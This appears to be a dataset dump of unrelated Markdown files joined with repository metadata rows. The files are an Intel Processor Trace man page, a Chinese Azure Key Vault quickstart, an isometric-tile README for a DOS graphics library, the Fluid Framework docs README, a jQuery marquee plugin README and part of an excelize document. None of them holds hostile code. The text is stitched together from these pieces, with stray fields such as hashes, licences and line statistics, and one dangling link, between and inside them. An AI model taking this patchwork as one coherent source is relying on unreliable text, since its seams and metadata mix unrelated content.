"BSD-3-Clause"
] | null | null | null | doc/man/pt_enc_get_config.3.md | tbaederr/libipt | dcdda58cf5e98af1a0e8f36a133c72d602b0a116 | [
"BSD-3-Clause"
] | null | null | null | % PT_ENC_GET_CONFIG(3)
<!---
! Copyright (c) 2015-2021, Intel Corporation
!
! Redistribution and use in source and binary forms, with or without
! modification, are permitted provided that the following conditions are met:
!
! * Redistributions of source code must retain the above copyright notice,
! this list of conditions and the following disclaimer.
! * Redistributions in binary form must reproduce the above copyright notice,
! this list of conditions and the following disclaimer in the documentation
! and/or other materials provided with the distribution.
! * Neither the name of Intel Corporation nor the names of its contributors
! may be used to endorse or promote products derived from this software
! without specific prior written permission.
!
! THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
! AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
! IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
! ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
! LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
! CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
! SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
! INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
! CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
! ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
! POSSIBILITY OF SUCH DAMAGE.
!-->
# NAME
pt_enc_get_config, pt_pkt_get_config, pt_qry_get_config, pt_insn_get_config,
pt_blk_get_config - get an Intel(R) Processor Trace encoder/decoder's
configuration
# SYNOPSIS
| **\#include `<intel-pt.h>`**
|
| **const struct pt_config \***
| **pt_enc_get_config(const struct pt_encoder \**encoder*);**
|
| **const struct pt_config \***
| **pt_pkt_get_config(const struct pt_packet_decoder \**decoder*);**
|
| **const struct pt_config \***
| **pt_qry_get_config(const struct pt_query_decoder \**decoder*);**
|
| **const struct pt_config \***
| **pt_insn_get_config(const struct pt_insn_decoder \**decoder*);**
|
| **const struct pt_config \***
| **pt_blk_get_config(const struct pt_block_decoder \**decoder*);**
Link with *-lipt*.
# DESCRIPTION
These functions return a pointer to their argument's configuration. The
returned configuration object must not be freed. It is valid as long as their
argument is not freed.
# RETURN VALUE
These functions returns a pointer to a *pt_config* object. The returned pointer
is NULL if their argument is NULL.
# SEE ALSO
**pt_config**(3), **pt_alloc_encoder**(3), **pt_pkt_alloc_decoder**(3),
**pt_qry_alloc_decoder**(3), **pt_insn_alloc_decoder**(3),
**pt_blk_alloc_decoder**(3)
| 36.25641 | 80 | 0.748939 | kor_Hang | 0.377788 |
973070fcb467fdfb2b4bab63281bebef21f13853 | 5,719 | md | Markdown | articles/key-vault/quick-create-net.md | ningchencontact/azure-docs.zh-tw | 85eb44c48f6993d41f51f680ad19190e0a1cac0b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/key-vault/quick-create-net.md | ningchencontact/azure-docs.zh-tw | 85eb44c48f6993d41f51f680ad19190e0a1cac0b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/key-vault/quick-create-net.md | ningchencontact/azure-docs.zh-tw | 85eb44c48f6993d41f51f680ad19190e0a1cac0b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Azure 快速入門 - 設定 Azure Web 應用程式以從 Key Vault 設定及擷取祕密 | Microsoft Docs
description: 快速入門會示範如何設定 ASP.Net Core 應用程式以從 Key Vault 設定及擷取祕密
services: key-vault
author: prashanthyv
manager: sumedhb
ms.service: key-vault
ms.topic: quickstart
ms.date: 07/24/2018
ms.author: barclayn
ms.custom: mvc
ms.openlocfilehash: 8b5624ae3083d92213b4ee919dc0860bf5ff4ab7
ms.sourcegitcommit: fc5555a0250e3ef4914b077e017d30185b4a27e6
ms.translationtype: HT
ms.contentlocale: zh-TW
ms.lasthandoff: 08/03/2018
ms.locfileid: "39480197"
---
# <a name="quickstart-set-and-retrieve-a-secret-from-azure-key-vault-using-a-net-web-app"></a>快速入門:使用 .NET Web 應用程式從 Azure Key Vault 設定及擷取祕密
在本快速入門中,我們將引導您完成讓 Azure Web 應用程式使用受控服務識別從 Key Vault 讀取資訊所需的步驟。 您會了解如何:
> [!div class="checklist"]
> * 建立 Key Vault。
> * 將密碼儲存在 Key Vault 中。
> * 從 Key Vault 擷取祕密。
> * 建立 Azure Web 應用程式。
> * [啟用受控服務識別](../active-directory/managed-service-identity/overview.md)。
> * 授與 Web 應用程式從 Key Vault 讀取資料所需的權限。
在我們繼續之前,請閱讀[基本概念](key-vault-whatis.md#basic-concepts),特別是[受控服務識別](../active-directory/managed-service-identity/overview.md)
## <a name="prerequisites"></a>必要條件
* 在 Windows 上:
* [Visual Studio 2017 15.7.3 版或更新版本](https://www.microsoft.com/net/download/windows),具有下列工作負載:
* ASP.NET 和 Web 開發
* .NET Core 跨平台開發
* [.NET Core 2.1 SDK 或更新版本](https://www.microsoft.com/net/download/windows)
* 在 Mac 上:
* https://visualstudio.microsoft.com/vs/mac/
* 所有平台:
* 請從[這裡](https://git-scm.com/downloads)下載 GIT。
* Azure 訂用帳戶。 如果您沒有 Azure 訂用帳戶,請在開始前建立 [免費帳戶](https://azure.microsoft.com/free/?WT.mc_id=A261C142F) 。
* [Azure CLI](https://docs.microsoft.com/cli/azure/install-azure-cli?view=azure-cli-latest) 您需要 Azure CLI 2.0.4 版或更新版本。 這個工具適用於 Windows、Mac 和 Linux
## <a name="login-to-azure"></a>登入 Azure
若要使用 CLI 登入 Azure,您可以輸入:
```azurecli
az login
```
## <a name="create-a-resource-group"></a>建立資源群組
使用 [az group create](/cli/azure/group#az-group-create) 命令來建立資源群組。 Azure 資源群組是在其中部署與管理 Azure 資源的邏輯容器。
請選取資源群組名稱,並填入預留位置。
下列範例會在 eastus 位置建立名為 <YourResourceGroupName> 的資源群組。
```azurecli
# To list locations: az account list-locations --output table
az group create --name "<YourResourceGroupName>" --location "East US"
```
本文中會使用您剛建立的資源群組。
## <a name="create-an-azure-key-vault"></a>建立 Azure Key Vault
接下來,您會在上一個步驟中建立的資源群組中建立 Key Vault。 請提供下列資訊:
* Vault 名稱 - **請在這裡選取 Key Vault 名稱**。 Key Vault 名稱必須是包含 3-24 個字元的字串,而且只可使用 (0-9、a-z、A-Z 及 -)。
* 資源群組名稱 - **請在這裡選取資源群組名稱**。
* 位置 - **美國東部**。
```azurecli
az keyvault create --name "<YourKeyVaultName>" --resource-group "<YourResourceGroupName>" --location "East US"
```
此時,您的 Azure 帳戶是唯一獲得授權在此新保存庫上執行任何作業的帳戶。
## <a name="add-a-secret-to-key-vault"></a>將祕密新增至 Key Vault
我們將新增密碼,以協助說明其運作方式。 您可能正在儲存 SQL 連接字串,或任何您必須安全保存但可供您的應用程式使用的其他資訊。 在本教學課程中,密碼會稱為 **AppSecret**,並將在其中儲存 **MySecret** 的值。
輸入下列命令,以在 Key Vault 中建立稱為 **AppSecret** 並將儲存 **MySecret** 值的祕密:
```azurecli
az keyvault secret set --vault-name "<YourKeyVaultName>" --name "AppSecret" --value "MySecret"
```
若要以純文字檢視包含在祕密中的值:
```azurecli
az keyvault secret show --name "AppSecret" --vault-name "<YourKeyVaultName>"
```
此命令會顯示祕密資訊,包括 URI。 完成這些步驟之後,您的 Azure Key Vault 中應該會有密碼的 URI。 請記下此資訊。 您在稍後的步驟中需要此資訊。
## <a name="clone-the-repo"></a>複製存放庫
複製存放庫以便製作本機複本,讓您可以藉由執行下列命令以編輯來源:
```
git clone https://github.com/Azure-Samples/key-vault-dotnet-core-quickstart.git
```
## <a name="open-and-edit-the-solution"></a>開啟及編輯解決方案
編輯 program.cs 檔案,以便使用您的特定金鑰保存庫名稱來執行範例。
1. 瀏覽至 key-vault-dotnet-core-quickstart 資料夾
2. 在 Visual Studio 2017 中開啟 key-vault-dotnet-core-quickstart.sln 檔案
3. 開啟 Program.cs 檔案,並且使用您稍早建立的 Key Vault 名稱更新預留位置 <YourKeyVaultName>。
這個解決方案會使用 [AppAuthentication](https://www.nuget.org/packages/Microsoft.Azure.Services.AppAuthentication) 和 [KeyVault](https://www.nuget.org/packages/Microsoft.Azure.KeyVault) NuGet 程式庫
## <a name="run-the-app"></a>執行應用程式
從 Visual Studio 2017 的主功能表中,選擇 [偵錯 > 啟動但不偵錯]。 當瀏覽器出現時,瀏覽至 [關於] 頁面。 AppSecret 的值隨即顯示。
## <a name="publish-the-web-application-to-azure"></a>將 Web 應用程式發佈至 Azure
我們會將此應用程式發佈至 Azure,以 Web 應用程式的形式即時查看,同時查看擷取祕密值
1. 在 Visual Studio 中,選取 **key-vault-dotnet-core-quickstart** 專案。
2. 選取 [發佈],然後選取 [開始]。
3. 建立新的 **App Service**,然後選取 [發佈]。
4. 將應用程式名稱變更為 "keyvaultdotnetcorequickstart"
5. 選取 [建立] 。
>[!VIDEO https://sec.ch9.ms/ch9/e93d/a6ac417f-2e63-4125-a37a-8f34bf0fe93d/KeyVault_high.mp4]
## <a name="enable-managed-service-identities-msi"></a>啟用受控服務識別 (MSI)
Azure Key Vault 可安全地儲存認證和其他金鑰及祕密,但是您的程式碼必須向 Azure Key Vault 進行驗證,才可擷取這些項目。 受控服務識別 (MSI) 可以輕易地解決此問題,因為 MSI 可在 Azure Active Directory (Azure AD) 中將自動受控識別提供給 Azure 服務。 您可以使用此身分識別來完成任何支援 Azure AD 驗證的服務驗證 (包括 Key Vault),不需要任何您程式碼中的認證。
1. 返回 Azure CLI
2. 執行 assign-identity 命令來建立此應用程式的識別:
```azurecli
az webapp identity assign --name "keyvaultdotnetcorequickstart" --resource-group "<YourResourceGroupName>"
```
>[!NOTE]
>此命令等同於前往入口網站,並在 Web 應用程式屬性中將 [受控服務識別] 切換為 [開啟]。
## <a name="assign-permissions-to-your-application-to-read-secrets-from-key-vault"></a>將權限指派給您的應用程式,以便從 Key Vault 讀取秘密
當您 [將應用程式發佈到 Azure][] 時,請記下輸出。 其格式應為:
{
"principalId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
"tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
"type": "SystemAssigned"
}
然後,使用 Key Vault 名稱以及從上方複製的 PrincipalId 值,來執行這個命令:
```azurecli
az keyvault set-policy --name '<YourKeyVaultName>' --object-id <PrincipalId> --secret-permissions get
```
## <a name="next-steps"></a>後續步驟
* [Azure Key Vault 首頁](https://azure.microsoft.com/services/key-vault/)
* [Azure Key Vault 文件](https://docs.microsoft.com/azure/key-vault/)
* [適用於 .NET 的 Azure SDK](https://github.com/Azure/azure-sdk-for-net)
* [Azure REST API 參考](https://docs.microsoft.com/rest/api/keyvault/)
| 32.68 | 229 | 0.730722 | yue_Hant | 0.88528 |
9730e67389e814985abd1de4f989e2580e01736e | 5,689 | md | Markdown | SRC/ISOTEST/readme.md | dschmenk/LORES | f826690c4df9233198fc95bbef55586639acfb5a | [
"BSD-2-Clause"
] | 1 | 2022-03-14T13:11:35.000Z | 2022-03-14T13:11:35.000Z | SRC/ISOTEST/readme.md | dschmenk/LORES | f826690c4df9233198fc95bbef55586639acfb5a | [
"BSD-2-Clause"
] | null | null | null | SRC/ISOTEST/readme.md | dschmenk/LORES | f826690c4df9233198fc95bbef55586639acfb5a | [
"BSD-2-Clause"
] | 1 | 2022-03-09T15:04:14.000Z | 2022-03-09T15:04:14.000Z | # Isometric Test Harness

https://youtu.be/ne-p3P5NYD4
I've always been a fan of the isometric view for games. It is a visually interesting projection that combines the simplicity of a top down view with a pseudo-3D aesthetic that conveys a sophisticated image without the overhead of a real 3D implementation. I figured that the LORES library might be able to pull off a simplified isometric environment, but there are a few issues to work through in order to do so.
One of the constraints of the LORES library scrolling actually works in our favor: scrolling horizontally by two pixels with the ability of scrolling vertically by one pixel matches well with the 2:1 aspect ration of an isometric tile. And that is about the only common ground between the LORES library and isometric tiles.
The LORES library is based around square 16x16 pixel tiles. Isometric tiles (technically, these aren't perfect isometric tiles) look more like flattened diamond shapes with a 2:1 aspect ratio - two pixels wide for each vertical pixel. This gives the impression of looking at a scene from a 45 degree diagonal and an elevated height. I took the approach of mapping 32x16 isometric tiles to 16x16 square tiles using a combination of modern tools and my image converter program, 'slicer', found in the MAPEDIT directory. Note that it isn't as simple as just making tiles that are twice as wide as the 16x16 LORES tiles - the isometric tiles' origin alternates from intersecting the 16x16 tile grid to halfway between the LORES tile grid. Read on to see my conversion workflow...
## Creating an Isometric Grid and Map
Watching some YouTube videos on how all the cool kids create their isometric tile maps for use in Unity, I found a very nifty program called Aseprite: https://www.aseprite.org. I went ahead and bought this tool, affordably priced at $20 for a LOT of functionality. I created my first test map using Aseprite, but realized that I could have done everything just as easily using GIMP: https://www.gimp.org. So I exported the map file over to GIMP and worked from there.
### The Isometric Grid
First, I created an isometric grid to align the 32x16 isometric tile to the 16x16 square tiles and create a guide for drawing the isometric tiles. Image layers are a powerful tool used in many image manipulation programs like Photoshop, Aseprite and GIMP. Taking advantage of this tool is very useful. I created the base layer as the isometric grid. Drawing the actual isometric tile images on transparent layers above this allows for easy edge alignment. Use as many layers as you want for floors, walls, etc. By keeping them on separate layers as you draw them makes arrangement a breeze. I also made a solid black layer just above the grid layer that I normally keep invisible so the grid shows through. By toggling its visibility, it shows me what the map looks like without the underlying grid.
### Isometric Tiles
Using layers for different tiles makes for an easy alignment process. For instance, create a floor tile that will be used many times. I will create the base tile off to the side. Once satisfied, I will select it and copy it. Then the copy can be pasted around the map using the grid as a guide. You will find my 'isotest.xcf' GIMP image file that has all the isometric tiles flattened to one layer.
## Exporting Map for Slicing and Conversion
When it's time to convert the isometric map into something digestible to LORES, set the visibility of the black background layer (or whatever color you want for the background) to 'visible' and export to a '.pnm' Portable BitMap format using 'Raw' data values. This will be fed into the 'slicer' tool. The [slicer](../MAPEDIT/slicer.c) tool is very generic C code that should compile under just about any modern platform. It takes a Portable BitMap '.pnm' file (raw RGB values with a simple ASCII header) and converts it into a '.SET' tile set file and a '.MAP' tile map file ready to import using the LORES MAPIO functions or further editing with MAPEDIT. 'slicer' will reduce all identical tiles into one to save memory so it is important to carefully align the isometric tiles and not introduce any spurious pixels that will cause additional tiles to be generated. My command line to for conversion is:
../MAPEDIT/slicer -g 1.8 -n isotest
This uses a gamma of 1.8 and disabled dithering for a closest 4 BPP IRGB color match, creating 'isotest.set' and 'isotest.map' from 'isotest.pnm'.
## ISOTEST.EXE
Finally there is a test harness program to scroll around the map. It simply uses the four arrow keys to scroll along the isometric axes, quitting with the 'ESC' key. It includes two additional routines to convert between world coordinates (s,t) and screen coordinates (x,y).
## Limitations
Of course there are going to be limitations to what can be accomplished with the LORES library and what one might expect from a modern isometric implementation. Most isometric games allow characters to move behind objects and be properly occluded. LORES has no such concept, so care must be taken to keep objects/sprites always in front or hide them completely when occluded. Adding height to the tiles isn't impossible, but will take additional programming effort over what I've done here. Remeber there is a limit to the number of sprites that can be updated per frame, so don't expect to be able to implement melee of fighting sprites without clever programming & scheduling.
## Future Effects
Adding visibility to the map is one thing I would like to explore. Populating the map as the player moves through the map so the entire map isn't exposed all at once should be quite doable.
| 129.295455 | 905 | 0.792758 | eng_Latn | 0.999313 |
973177edd7795da5c3a49b72d5d6645f6a3c66aa | 255 | md | Markdown | src/data/tabs/skills.md | novicexp/devweb-react | b975ce26e1d199353f92812a309be8f07a5560ff | [
"RSA-MD"
] | null | null | null | src/data/tabs/skills.md | novicexp/devweb-react | b975ce26e1d199353f92812a309be8f07a5560ff | [
"RSA-MD"
] | null | null | null | src/data/tabs/skills.md | novicexp/devweb-react | b975ce26e1d199353f92812a309be8f07a5560ff | [
"RSA-MD"
] | null | null | null | ### Programming languages / tech stacks
- C
- C++
- Python
- Web Development
- Backend
- Django
- Frontend
- Simple
- HTML
- CSS
- Bootstrap
- Javascript
- Framework
- React
- Gatsby
- Firebase
- Git
| 11.590909 | 39 | 0.533333 | kor_Hang | 0.410653 |
9732b584cd3cb4fe606770f2d25e2a207031086b | 2,963 | md | Markdown | README.md | JinaKim77/Project-2020_Emerging-Technologies | 6dfcca5d38e251f7f25bce159540f34d7b9852b4 | [
"MIT"
] | null | null | null | README.md | JinaKim77/Project-2020_Emerging-Technologies | 6dfcca5d38e251f7f25bce159540f34d7b9852b4 | [
"MIT"
] | null | null | null | README.md | JinaKim77/Project-2020_Emerging-Technologies | 6dfcca5d38e251f7f25bce159540f34d7b9852b4 | [
"MIT"
] | null | null | null | <h2 align="center">
Project 2020_Emerging Technologies
</h2>
<br>
<h3 align="center">
This repository contains the Project assessment for Emerging Technologies in 2020
</h3>
<br>
<p align="center">
<img src="./GMIT_Logo.PNG" width=700 height=250/>
</p>
## Project Details
Heading | Details
------------|-------------------------------------
Project | [Spec](https://github.com/JinaKim77/Project-2020_Emerging-Technologies/blob/main/Project2020_Emerging%20Technologies.pdf)
Course | BSc (Hons) in Software Development
Module | Emerging Technologies
Authors | Jina Kim
ID | G00353420
Lecturer | Ian McLoughlin
## Project Specifications
This project is a web service that uses machine learning to make predictions based on the data set powerproduction. The goal is to produce a model that accurately predicts wind turbine power output from wind speed values, as in the data set. It is a web service that will respond with predicted power values based on speed values sent as HTTP requests.
* Jupyter notebook that trains a model using the data set. In the notebook you should explain your model and give an analysis of its accuracy.
<br>
* Python script that runs a web service based on the model
<br>
* Dockerfile to build and run the web service in a container.
<br>
## Jupyter notebook
Jupyter Book is an open-source tool for building publication-quality books and documents from computational material.
<br>
## Installation
You can find the installation documentation for the [Jupyter platform, on ReadTheDocs](https://jupyter.readthedocs.io/en/latest/install.html). The documentation for advanced usage of Jupyter notebook can be found [here](https://jupyter-notebook.readthedocs.io/en/latest/).
<br>
For a local installation, make sure you have [pip installed](https://pip.pypa.io/en/stable/installing/) and run:
<br>
`pip install notebook`
<br>
<br>
## Running in a local installation
1. Ensure Anaconda is installed on your computer.
2. Clone this repository to your computer.
`git clone https://github.com/JinaKim77/Project-2020_Emerging-Technologies.git`
3. Navigate to where you have cloned the repository, using cmd(Windows)
4. Type jupyter notebook on the cmd, this will launch a new browser window or new tab.
`jupyter notebook`
5. Double click on the file titled windTurbinePower.ipynb
<br>
## How to Run the project
<br>
### In Linux
`export FLASK_APP=power.py`
`python3 -m flask run`
<br>
### In Windows
`set FLASK_APP=power.py`
`python -m flask run`
<br>
#### Docker
`docker build -t power-app .`
##### => Docker starts the container in the background and printed the Container ID on the terminal.
`docker run -d -p 5000:5000 power-app`
<br>
## Further Information
Further details about this project is documented in the [Project Specification](https://github.com/JinaKim77/Project-2020_Emerging-Technologies/blob/main/Project2020_Emerging%20Technologies.pdf).
| 27.95283 | 352 | 0.741478 | eng_Latn | 0.96418 |
9732b972de97b6e79ee3205bd4f74bff82cf9555 | 7,745 | md | Markdown | docs/README.md | jamesbond004/FluidFramework | cab1c1701e0c65c6cacc98f9341d72fbaf7da1c1 | [
"MIT"
] | null | null | null | docs/README.md | jamesbond004/FluidFramework | cab1c1701e0c65c6cacc98f9341d72fbaf7da1c1 | [
"MIT"
] | 8 | 2021-09-02T21:38:10.000Z | 2022-02-14T17:24:29.000Z | docs/README.md | jamesbond004/FluidFramework | cab1c1701e0c65c6cacc98f9341d72fbaf7da1c1 | [
"MIT"
] | 1 | 2022-03-04T05:25:02.000Z | 2022-03-04T05:25:02.000Z | # fluidframework-docs
This is the code and content for <https://fluidframework.com>.
## Previewing the documentation site locally
Open the docs folder in a terminal and install the dependencies using npm.
```bash
cd docs
npm install
```
Then, start the server.
```bash
npm start
```
Open <http://localhost:1313> to preview the site.
### API documentation and Playground
The steps above won't include API documentation (the TSDoc JSON files) or the Playground by default. You can
download the latest API docs and Playground files with the `download` script.
```bash
npm run download
```
Note that this script will **overwrite any locally built API docs.**
## Building the documentation
Run the `build` script to build the site. The output will be in the `public/` folder.
```bash
npm run build
```
### Drafts and future content
By default the `build` script won't build content with a future published date or draft flag.
To build this content, use the `--buildDrafts` and `--buildFuture` flags.
```bash
npm run build -- --buildDrafts --buildFuture
```
Content with a future published date won't automatically publish on that date. You'll
need to run the build process.
### API documentation
Building API documentation locally requires an extra step to generate the content from the source.
From the root of the repository:
```bash
npm install
npm run build:fast -- --symlink:full --install --all
npm run build:fast -- -s build -s build:docs --nolint --all
```
You can then build or preview the docs using the steps described earlier.
Note that this will leave the fluid-build tool in full-symlink mode. To return to the default isolated
mode (e.g. for typical development) run:
```bash
npm run build:fast -- --symlink
```
### Understanding the API documentation build pipeline
If you encounter problems updating or building the API docs, it can be helpful to have a high-level
understanding of how it gets built. The steps are as follows:
1. Root: `build:fast`
1. Compile the code, generating TypeScript definitions, etc.
1. Root: `build:docs`
1. Run the @microsoft/api-extractor (using Lerna) in each package to extract documentation info in a JSON format.
The output is placed in a folder `_api-extractor-temp` in each package's directory.
1. The JSON is also copied from each package up to a shared `_api-extractor-temp` directory under the repository
root.
1. `/docs`: `build`
1. Run markdown-magic to update some shared content in the source Markdown files.
1. Run the @mattetti/api-extractor tool to transform the JSON format into Markdown. The generated Markdown is
placed at `/docs/content/apis`. We maintain this fork of @microsoft/api-extractor
[here](https://github.com/mattetti/custom-api-documenter).
1. Run ditaa to build some of the diagrams in the site.
1. Run hugo to build the site itself. The generated output is placed at `/docs/public/apis`.
1. `/docs`: `start`
1. Run the hugo server to host the site at <http://localhost:1313>.
To investigate incorrect output, you can check the intermediate outputs (JSON, Markdown, HTML) at these locations
to narrow down where the error is occurring.
## Creating new content
You need to generate new content manually by creating new files by hand or by
generating them using the `hugo` command as shown below:
### Static doc
```bash
npm run hugo -- new docs/concepts/flux-capacitor.md
```
### Blog post
```bash
npm run hugo -- new posts/fluid-everywhere.md
```
### Content guidelines
Try to use Markdown as much as possible. You can embed HTML in Markdown, but we
recommended sticking to Markdown and shortcodes/partials.
## Menus
Menus are mainly managed in `config.yml` but depending on the menu, the sub
headers might be driven by the content in the repo (pages or data files).
### Main menu (top menu)
The top menu is configured in the `config.yml` file and can look like this:
```yaml
menu:
main:
- name: "Docs"
url: "/docs/"
weight: -90
- name: "API"
url: "/apis/"
weight: -80
- name: "Blog"
url: "/posts/"
weight: -50
```
### Docs menu
The docs menu is implemented in the theme's `_partial/docNav.html` and is using the
`config.yml` to find the headers and then uses the area attribute of each sub section (sub
folders in the content folder) to populate the pages displayed in the menu.
Here is an example of what `config.yml` could contain:
```yaml
menu:
docs:
- identifier: "get-started"
name: "Get Started"
weight: -500
- identifier: "concepts"
name: "Main concepts"
weight: -300
- identifier: "faq"
name: "FAQ"
url: "/docs/faq/"
weight: -100
```
Those are headers for the Docs menu, they each have a `name` field which is used to
display the header in the menu. They also have an `identifier` key which is used to map
content with matching `area` field (often set to cascade within a sub folder). Finally,
you have a `weight` field that is used to decide the positioning of each item in the menu.
The lighter an item is, the higher it goes in order (closer to the top).
### API menu
The API menu is a bit more complex since it's driven by content. The left menu (API
overview) is a list of grouped packages, the grouping comes from a yaml file in the `data`
folder (`packages.yaml`). The API documentation is being generated with metadata which
allows the template to link pages and load the right information.
### Table of Contents
Some template pages include a TOC of the page. This is generated on the fly by reading the
headers.
### Social action
There is a menu with actions such as tweeting the page, subscribing to the feed, asking
questions etc... This is driven from the theme and the information for the accounts should
be in the config.
## Shortcodes
[Shortcodes](https://gohugo.io/content-management/shortcodes/) are custom functions that
can be called from within the Markdown to insert specific content.
## Working on the template
The site theme/template lives in `themes/thxvscode`.
## Scripts
<!-- AUTO-GENERATED-CONTENT:START (SCRIPTS) -->
| Script | Description |
|--------|-------------|
| `build` | Build the site; outputs to `public/` by default. |
| `build:api` | `npm run build:uber-package && npm run build:api-documenter` |
| `build:api-documenter` | Convert API JSON into Markdown. |
| `build:api-documenter:default` | --- |
| `build:api-documenter:win32` | --- |
| `build:api-rollup` | Runs `rollup-api-json.js` to produce rolled-up API data. See the script for more details. |
| `build:diagrams` | Generate the diagram images using ditaa. |
| `build:fast` | Builds the site in a fast, but incomplete way. Useful for testing and iteration. |
| `build:md-magic` | Updates generated content in Markdown files. |
| `ci:build` | `npm run download && npm run build` |
| `clean` | Remove all generated files. |
| `ditaa` | Run the local copy of ditaa. |
| `ditaa:default` | --- |
| `ditaa:win32` | --- |
| `download` | Download and extract the API JSON and Playground files locally. |
| `download:api` | Download and extract the API JSON files locally. |
| `hugo` | Run the local copy of Hugo. |
| `install:ditaa` | Install ditaa to generate diagrams unless it already exists. |
| `install:ditaa:default` | --- |
| `install:ditaa:force` | Install ditaa to generate diagrams. |
| `install:ditaa:win32` | --- |
| `linkcheck` | `npm run linkcheck:site` |
| `linkcheck:fast` | `linkcheck http://localhost:1313 --skip-file skipped-urls.txt` |
| `lint` | `markdownlint-cli2` |
| `lint:fix` | `markdownlint-cli2-fix` |
| `postinstall` | --- |
| `start` | Start a local webserver to preview the built site on <http://localhost:1313> |
<!-- AUTO-GENERATED-CONTENT:END -->
| 33.240343 | 117 | 0.717883 | eng_Latn | 0.992463 |
97339a2e10bb05b71578b183343bb9abdb4080d4 | 1,165 | md | Markdown | src/_posts/paperfaces/2014-01-02-imuggle-portrait.md | charnsak/test2 | f8625ce06defa86ec2fed61ccf34961bc91f99b3 | [
"MIT"
] | null | null | null | src/_posts/paperfaces/2014-01-02-imuggle-portrait.md | charnsak/test2 | f8625ce06defa86ec2fed61ccf34961bc91f99b3 | [
"MIT"
] | null | null | null | src/_posts/paperfaces/2014-01-02-imuggle-portrait.md | charnsak/test2 | f8625ce06defa86ec2fed61ccf34961bc91f99b3 | [
"MIT"
] | null | null | null | ---
title: "Pink sweater"
excerpt: "PaperFaces portrait of @imuggle drawn with Paper by 53 on an iPad."
image:
path: &image /assets/images/paperfaces-imuggle-twitter.jpg
feature: *image
thumbnail: /assets/images/paperfaces-imuggle-twitter-150.jpg
tags: [portrait, illustration, Paper by 53]
---
PaperFaces portrait of [@iMuggle](http://twitter.com/iMuggle).
{% include boilerplate/paperfaces-2.md %}
<figure class="half">
<a href="/assets/images/paperfaces-imuggle-process-1-lg.jpg"><img src="/assets/images/paperfaces-imuggle-process-1-600.jpg" alt="Work in process screenshot"></a>
<a href="/assets/images/paperfaces-imuggle-process-2-lg.jpg"><img src="/assets/images/paperfaces-imuggle-process-2-600.jpg" alt="Work in process screenshot"></a>
<a href="/assets/images/paperfaces-imuggle-process-3-lg.jpg"><img src="/assets/images/paperfaces-imuggle-process-3-600.jpg" alt="Work in process screenshot"></a>
<a href="/assets/images/paperfaces-imuggle-process-4-lg.jpg"><img src="/assets/images/paperfaces-imuggle-process-4-600.jpg" alt="Work in process screenshot"></a>
<figcaption>Work in progress screenshots (Paper by 53).</figcaption>
</figure>
| 52.954545 | 162 | 0.747639 | eng_Latn | 0.324943 |
9733a526d8ee1c9b5943c6b6c7ea82b0ef7aaf6e | 1,238 | md | Markdown | README.md | bafsar/jQuery.SSMarquee | 278b1abb5cc632b6a05f41a5d8c326822904caba | [
"MIT"
] | 2 | 2017-07-13T21:49:30.000Z | 2017-07-13T21:49:32.000Z | README.md | bafsar/jQuery.SSMarquee | 278b1abb5cc632b6a05f41a5d8c326822904caba | [
"MIT"
] | null | null | null | README.md | bafsar/jQuery.SSMarquee | 278b1abb5cc632b6a05f41a5d8c326822904caba | [
"MIT"
] | null | null | null | # jQuery.SSMarquee
A jQuery plugin instead of traditional -obsolete- marquee tag
## Demo:
[Demo on my website](https://www.bilalafsar.com/Upload/Files/jQuery.SSMarquee.Demo.html)
## Using
```html
// Default parameters
$(".marqueeElement").SSMarquee();
// Custom parameters
$(".marqueeElement").SSMarquee({ direction: "bottom", speed: 30, scrollAmount: 1.2, pauseOnHover: false, bufferSize: 20 });
```
## Parameters:
* **direction** : Flow direction. It can take these values: "top", "bottom", "left", "right". Defaut value is "top".
* **speed** : Flow speed as milisecond. Lower value means faster. It takes an integer value. It must be between 10 and 70 . Default value is 45.
* **scrollAmount** : Flow amount as px. It takes a float value. When value is lower than zero or invalid, the value is sets to 1.
* **pauseOnHover** : Must flow pause when mouse hover on element? Default value is true.
* **bufferSize** : Space size as px. Before and after complete of flow, adds some space. It takes an integer value. Default value is 10.
## Notes:
* For adaptation of responsive structure, when window resize, the marquee is resets.
* **marqueeElement must have just one element. You can add anything you want inside of this element.**
| 45.851852 | 144 | 0.725363 | eng_Latn | 0.958648 |
9733c66eebcee47fc6bde7d28d43c164fae25500 | 16,202 | md | Markdown | zh-hans/utils.md | q523591/excelize-doc | 45593333ca2b4003865c5433d1852cc906559aae | [
"MIT"
] | null | null | null | zh-hans/utils.md | q523591/excelize-doc | 45593333ca2b4003865c5433d1852cc906559aae | [
"MIT"
] | null | null | null | zh-hans/utils.md | q523591/excelize-doc | 45593333ca2b4003865c5433d1852cc906559aae | [
"MIT"
] | null | null | null | # 工具函数
## 创建表格 {#AddTable}
```go
func (f *File) AddTable(sheet, hcell, vcell, format string) error
```
根据给定的工作表名、单元格坐标区域和条件格式创建表格。
- 例1,在名为 `Sheet1` 的工作表 `A1:D5` 区域创建表格:
<p align="center"><img width="612" src="./images/addtable_01.png" alt="创建表格"></p>
```go
xlsx.AddTable("Sheet1", "A1", "D5", ``)
```
- 例2,在名为 `Sheet2` 的工作表 `F2:H6` 区域创建带有条件格式的表格:
<p align="center"><img width="612" src="./images/addtable_02.png" alt="创建带有条件格式的表格"></p>
```go
xlsx.AddTable("Sheet2", "F2", "H6", `{"table_name":"table","table_style":"TableStyleMedium2", "show_first_column":true,"show_last_column":true,"show_row_stripes":false,"show_column_stripes":true}`)
```
